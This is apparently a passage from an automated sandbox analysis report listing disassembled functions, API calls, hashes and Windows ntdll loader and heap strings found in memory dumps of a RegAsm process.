                                • Opcode Fuzzy Hash: 410d0e9143d4020b8a6aae258be14db686c65e6f57224d5bd35b00bbd2e1ea86
                                • Instruction Fuzzy Hash: 31E092B22002147BD610EE9AEC41F9B37ACEFC4710F008419FA08A7241D675B91087B8
                                Function 0042D1A3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 197 42d1a3-42d1e4 call 4048f3 call 42e073 RtlFreeHeap
                                APIs
                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8B5A8279,00000007,00000000,00000004,00000000,004177C9,000000F4), ref: 0042D1DF
                                Memory Dump Source
                                • Source File: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: bf9b3b606b360d8ef7542bf77a1065b0c88594b9b14cd1931fab7db17ec5ce49
                                • Instruction ID: e239419f071058c402d1cca2ecf357ad84d18736701478b7885498ac9f6fd536
                                • Opcode Fuzzy Hash: bf9b3b606b360d8ef7542bf77a1065b0c88594b9b14cd1931fab7db17ec5ce49
                                • Instruction Fuzzy Hash: 59E06DB22002147BD614EE59DC42EAB37ADEFC4714F008419FE08A7242D671B91186B8
                                Function 0042D1F3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 207 42d1f3-42d22f call 4048f3 call 42e073 ExitProcess
                                APIs
                                • ExitProcess.KERNEL32(?,00000000,00000000,?,A332A5E1,?,?,A332A5E1), ref: 0042D22A
                                Memory Dump Source
                                • Source File: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID:
                                • API String ID: 621844428-0
                                • Opcode ID: 1eeef9b814ce5dbdd2fbb078e5355fc083b491a19b32f4d566a365c0cc94f793
                                • Instruction ID: 7d087f7f5858adb128510598b6aeb75ad25227ba0282fc6dd19918f884fa539b
                                • Opcode Fuzzy Hash: 1eeef9b814ce5dbdd2fbb078e5355fc083b491a19b32f4d566a365c0cc94f793
                                • Instruction Fuzzy Hash: 09E08C762016147BE220FB5BDC01F9B77ACDFC5724F01452AFA08A7245CAB5BA0187F4
                                Function 02C62C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 212 2c62c0a-2c62c0f 213 2c62c11-2c62c18 212->213 214 2c62c1f-2c62c26 LdrInitializeThunk 212->214
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: be8c8499bbaaabb881e276c0a17a26033876924933f31dc08b70949acdcb8d7e
                                • Instruction ID: e94e478d9e4d6c66f453175e3d7590da02bdbbc0a6cab725a56e2a6362a64e19
                                • Opcode Fuzzy Hash: be8c8499bbaaabb881e276c0a17a26033876924933f31dc08b70949acdcb8d7e
                                • Instruction Fuzzy Hash: 84B09B719419C5D9EA11E7604A0C717790167D0711F15C171D7030641E4738C1D1F176

                                Non-executed Functions

                                Function 02CA2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-2160512332
                                • Opcode ID: 577dae99d6e98ebd6837fef4ec34a4e07fd826b02818ef4faa69cd6d95563289
                                • Instruction ID: 7b94b888caddb889840cc1aed6f95868297436b74c113ac432ef320d81cd946c
                                • Opcode Fuzzy Hash: 577dae99d6e98ebd6837fef4ec34a4e07fd826b02818ef4faa69cd6d95563289
                                • Instruction Fuzzy Hash: 0C92AC71608392AFE720CF24C8A4B6BB7E9BF84758F04492DFA95D7250D770E944CB92
                                Function 02C58620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                Download Yara Rule
                                Strings
                                • Critical section debug info address, xrefs: 02C9541F, 02C9552E
                                • Critical section address, xrefs: 02C95425, 02C954BC, 02C95534
                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02C954E2
                                • corrupted critical section, xrefs: 02C954C2
                                • Thread is in a state in which it cannot own a critical section, xrefs: 02C95543
                                • double initialized or corrupted critical section, xrefs: 02C95508
                                • Address of the debug info found in the active list., xrefs: 02C954AE, 02C954FA
                                • 8, xrefs: 02C952E3
                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02C954CE
                                • Critical section address., xrefs: 02C95502
                                • Invalid debug info address of this critical section, xrefs: 02C954B6
                                • Thread identifier, xrefs: 02C9553A
                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02C9540A, 02C95496, 02C95519
                                • undeleted critical section in freed memory, xrefs: 02C9542B
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                • API String ID: 0-2368682639
                                • Opcode ID: b16d77930f09d0854a59d78cb678c32d7e3703f6440a0280d513d219fb98913b
                                • Instruction ID: 5cd1c8da883b7780ef546fb399c0569bc0616a43104dd06fe04647dd6e93f410
                                • Opcode Fuzzy Hash: b16d77930f09d0854a59d78cb678c32d7e3703f6440a0280d513d219fb98913b
                                • Instruction Fuzzy Hash: 3F81AEB0A40358EFEF21CF95C885BAEBBF9BB48714F508269F509B7680D371A941CB50
                                Function 02CD12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                • API String ID: 0-3591852110
                                • Opcode ID: d245df69ed37b975f8b67dd6ebe7b45fc0d5db62199149b26cc90df272711f46
                                • Instruction ID: 8ffcd061b4738cd54277b45f9bfe2132f506e5a952450bf5fde764c8a1d11d59
                                • Opcode Fuzzy Hash: d245df69ed37b975f8b67dd6ebe7b45fc0d5db62199149b26cc90df272711f46
                                • Instruction Fuzzy Hash: 7212F034600642DFDB25CF29C441BBABBF2FF49718F088459E68A8B651E7B4E981DF50
                                Function 02C1D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                • API String ID: 0-3532704233
                                • Opcode ID: 92b0290af369767dff3244370506330c5291bdb269aca4a385c9bc2f4f3a232c
                                • Instruction ID: 08d8a9dc35f8dd15387793d7f6b5970d3c6d4c02c1bc9f484995e1043a5b907a
                                • Opcode Fuzzy Hash: 92b0290af369767dff3244370506330c5291bdb269aca4a385c9bc2f4f3a232c
                                • Instruction Fuzzy Hash: A0B17BB25083519BC715DE24C481B6FB7E9AFC9754F01492EF98AD7200D730DA45EB92
                                Function 02CB9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                • API String ID: 0-3063724069
                                • Opcode ID: c2f9f1775c0dfa7702da4117d90c69079cdbc765395732460f90e7dae4dbb3b1
                                • Instruction ID: 8fc8ea09d5e55be54a60b4de66007223c3376b9ed396be3b2f2dc1bffce074a9
                                • Opcode Fuzzy Hash: c2f9f1775c0dfa7702da4117d90c69079cdbc765395732460f90e7dae4dbb3b1
                                • Instruction Fuzzy Hash: C9D1F572808391AFD722DB64C884BABB7E9AFC4754F040A29FB8497250D774DD488FD2
                                Function 02CD0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                • API String ID: 0-1700792311
                                • Opcode ID: 083b445425cfce4228a05b7d011b21ea8d18168a69de2643d7993f818a955e35
                                • Instruction ID: 4e0b5e23024e5f98d84c1b657c0d0fbf0f3e863fa339741cdfabd8dad56b8c8a
                                • Opcode Fuzzy Hash: 083b445425cfce4228a05b7d011b21ea8d18168a69de2643d7993f818a955e35
                                • Instruction Fuzzy Hash: A9D12135900685EFDB12DF6CD401AADBBF2FF8A708F088059E9469B612C730EA42DF54
                                Function 02C1D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                Download Yara Rule
                                Strings
                                • @, xrefs: 02C1D313
                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 02C1D2C3
                                • @, xrefs: 02C1D0FD
                                • @, xrefs: 02C1D2AF
                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 02C1D196
                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 02C1D146
                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 02C1D262
                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 02C1D0CF
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                • API String ID: 0-1356375266
                                • Opcode ID: c0d6dd2c46ffdcff5304f9aa670ecad0f5fbfe28464578daea311904b291d1a5
                                • Instruction ID: 8584696e3127dda91fdc775ebf66c763e786b47d68089fcd6218f77bfa810ff9
                                • Opcode Fuzzy Hash: c0d6dd2c46ffdcff5304f9aa670ecad0f5fbfe28464578daea311904b291d1a5
                                • Instruction Fuzzy Hash: 03A17A719083459FD321CF21C885B6BB7E8BB89729F00492EFA9996240D774DA48DF93
                                Function 02C1F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                • API String ID: 0-523794902
                                • Opcode ID: 6b1bad60f02a5d76f0db3aa1e1c84968194d454da9e5cc60cde3dcccaaa5071c
                                • Instruction ID: ae55aef69cc70629b0d52ffd7371ee7199af90968b2b11417f8d70cfce346306
                                • Opcode Fuzzy Hash: 6b1bad60f02a5d76f0db3aa1e1c84968194d454da9e5cc60cde3dcccaaa5071c
                                • Instruction Fuzzy Hash: 2342FE322083819FD715DF29C885B2ABBE6FF89308F0449ADE8868B751D734D941DF92
                                Function 02C3B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                • API String ID: 0-122214566
                                • Opcode ID: 763376da34f072d7e81c7f0eafcd605eadf53c0d3bdd8abfada007f2ec901136
                                • Instruction ID: 3693fcc0a8a468097c7d55814d2a75eb67408a7e3dbb042003d9ce401b01ad56
                                • Opcode Fuzzy Hash: 763376da34f072d7e81c7f0eafcd605eadf53c0d3bdd8abfada007f2ec901136
                                • Instruction Fuzzy Hash: 66C1B031A002199BDB269F64C890B7EB765FF8431CF1489A9ED06EB690DF70CE44D791
                                Function 02C563FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-792281065
                                • Opcode ID: b0cc6c9ae17714e4d8a59f2d5bc132469c88fd913e43fb9a83e4d6e97541ecc1
                                • Instruction ID: e8ad912653338c0ad58352a6ee1e68e95b57c2879135b0241b00a7556f0930ca
                                • Opcode Fuzzy Hash: b0cc6c9ae17714e4d8a59f2d5bc132469c88fd913e43fb9a83e4d6e97541ecc1
                                • Instruction Fuzzy Hash: 5C915930E40721ABEF39DF54E848B6A77A9BF81B28F500168ED0167B80D774DD82CB95
                                Function 02C5C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                Download Yara Rule
                                Strings
                                • LdrpInitializeProcess, xrefs: 02C5C6C4
                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 02C981E5
                                • Loading import redirection DLL: '%wZ', xrefs: 02C98170
                                • minkernel\ntdll\ldrredirect.c, xrefs: 02C98181, 02C981F5
                                • LdrpInitializeImportRedirection, xrefs: 02C98177, 02C981EB
                                • minkernel\ntdll\ldrinit.c, xrefs: 02C5C6C3
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                • API String ID: 0-475462383
                                • Opcode ID: a03b80f3b27560c11bfe971f24ac92eabc05226cf519ed083a251b83f88d0955
                                • Instruction ID: 31edc892ac1c48d338fecf60b2a97af6200756824ece1f173a1b9e44ed113111
                                • Opcode Fuzzy Hash: a03b80f3b27560c11bfe971f24ac92eabc05226cf519ed083a251b83f88d0955
                                • Instruction Fuzzy Hash: CE311571784341AFD310EF28DC4AE1BB7D6EF85B14F040598F9856B390DA60DE05DBA2
                                Function 02C52674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                Download Yara Rule
                                Strings
                                • RtlGetAssemblyStorageRoot, xrefs: 02C92160, 02C9219A, 02C921BA
                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 02C9219F
                                • SXS: %s() passed the empty activation context, xrefs: 02C92165
                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 02C92180
                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 02C921BF
                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 02C92178
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                • API String ID: 0-861424205
                                • Opcode ID: bce92b019be3c01d0765de471b8559fc6d9eb1786f2c5518f247c9ecf4fe79b1
                                • Instruction ID: be6bdcee817d969844188de136e12d6e2f9458feb1d82542fbeb324e5ef77b36
                                • Opcode Fuzzy Hash: bce92b019be3c01d0765de471b8559fc6d9eb1786f2c5518f247c9ecf4fe79b1
                                • Instruction Fuzzy Hash: A3310432A4022577FB21CA95CC85F6AB7A9DF95B84F050169FE05B7240D770EE80CBA6
                                Function 02C451EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                Download Yara Rule
                                Strings
                                • Kernel-MUI-Language-SKU, xrefs: 02C4542B
                                • Kernel-MUI-Language-Allowed, xrefs: 02C4527B
                                • Kernel-MUI-Language-Disallowed, xrefs: 02C45352
                                • WindowsExcludedProcs, xrefs: 02C4522A
                                • Kernel-MUI-Number-Allowed, xrefs: 02C45247
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                • API String ID: 0-258546922
                                • Opcode ID: 0b9cfe5fed8da4c35b1ee1f32635376e04a1014b492b70ded3d69c86ed38b61b
                                • Instruction ID: a4a22091731bb2ca8dfdf5c0dbd5dd66bf37fd2ff2bdf1cfc57fdb50b326b792
                                • Opcode Fuzzy Hash: 0b9cfe5fed8da4c35b1ee1f32635376e04a1014b492b70ded3d69c86ed38b61b
                                • Instruction Fuzzy Hash: 4CF14B72D10618EFCB12DF98C980AAFBBB9EF48794F55406AE505E7210DB749E01DFA0
                                Function 02C4D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-1975516107
                                • Opcode ID: c8a4bc1303ca76f5ee044edef0ff288182c3b291dedefda9c895539a98a6e57c
                                • Instruction ID: d48e81a8e8a11e02ce8f38023e6f3f1f86f8f13ce9cfcef8fa2357a2fdf8cfd6
                                • Opcode Fuzzy Hash: c8a4bc1303ca76f5ee044edef0ff288182c3b291dedefda9c895539a98a6e57c
                                • Instruction Fuzzy Hash: 0751F371E40345AFDB14EFA4D4847AEBBB2BF88708F144459D802AB681DB74A955CFD0
                                Function 02C5C720 Relevance: 6.4, Strings: 5, Instructions: 141COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @,$@,$Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-1924374964
                                • Opcode ID: 3862505af07eae4af2aefb2cdfcebd668b0bb9e2ee8d05b197750d3100bd84f4
                                • Instruction ID: 80738494b01dbf7f2887dc5adeda4a8c022d0f702aba4235f9660933d729a71b
                                • Opcode Fuzzy Hash: 3862505af07eae4af2aefb2cdfcebd668b0bb9e2ee8d05b197750d3100bd84f4
                                • Instruction Fuzzy Hash: 73412271980310BBDB20EB64D844B5B77E9EF89B90F00492AFD4983750EB70DE51DB91
                                Function 02C176B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                • API String ID: 0-3061284088
                                • Opcode ID: df2513a24cba6d69e60a5fc5a745772bc3d86d1995a54d835837eccc0e5e79bb
                                • Instruction ID: 31e0a8acba57c50851412732feca07b5856158ca72c3cd75f690332e1238a0a4
                                • Opcode Fuzzy Hash: df2513a24cba6d69e60a5fc5a745772bc3d86d1995a54d835837eccc0e5e79bb
                                • Instruction Fuzzy Hash: DC01FC36155640EEF3259728F40BF96F7F4EB47B78F284099F00147A61CBA49C85EEA0
                                Function 02C370C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                • API String ID: 0-3178619729
                                • Opcode ID: 4e1b92ab954377fea28558e72623927ffc0468bdf872ff767a06854671c48512
                                • Instruction ID: ac54be79e5d631f8283d24911c3cd630d59c4721ce627ee68b255fe7d5e2a9cf
                                • Opcode Fuzzy Hash: 4e1b92ab954377fea28558e72623927ffc0468bdf872ff767a06854671c48512
                                • Instruction Fuzzy Hash: AA13C3B0A00655DFDB26CF69C4907A9FBF1FF89304F148A99E849AB381D734A945CF90
                                Function 02C31070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                • API String ID: 0-3570731704
                                • Opcode ID: edf5f02f9c0b65a53b86e150650c99cec67dca34cff05ae2197795b11012f7c9
                                • Instruction ID: 620c4bef00bf6280ad4be1a7bbcbbbc1d2a5819681b3106da74b816dde3d535b
                                • Opcode Fuzzy Hash: edf5f02f9c0b65a53b86e150650c99cec67dca34cff05ae2197795b11012f7c9
                                • Instruction Fuzzy Hash: A6924871A00268CFEB25DF19CC80BA9B7B6BF85354F0985EAD94DA7240D7B09E81CF51
                                Function 02C2A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                • API String ID: 0-379654539
                                • Opcode ID: 73fc192038814b9a97c6382d9fe89cc884ceb8fdec95a8f3109a8019c63bfa54
                                • Instruction ID: 296a77eec8f698c1820564e95b52643d783ee544affd0ceff3a802e665084d38
                                • Opcode Fuzzy Hash: 73fc192038814b9a97c6382d9fe89cc884ceb8fdec95a8f3109a8019c63bfa54
                                • Instruction Fuzzy Hash: 66C19A74108792CFD721DF29C544B6BB7E5FF84708F00896AF9968B250EB34DA49CB92
                                Function 02C5273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                Download Yara Rule
                                Strings
                                • SXS: %s() passed the empty activation context, xrefs: 02C921DE
                                • .Local, xrefs: 02C528D8
                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 02C921D9, 02C922B1
                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 02C922B6
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                • API String ID: 0-1239276146
                                • Opcode ID: 8205426a4274ab6e40768640218e1a7da0e66167f5aa380dc99099668968733c
                                • Instruction ID: 804343aad628c39b4d002d9c88c5b4643c2514a58ccc9fa84d16bbc8a89e65cd
                                • Opcode Fuzzy Hash: 8205426a4274ab6e40768640218e1a7da0e66167f5aa380dc99099668968733c
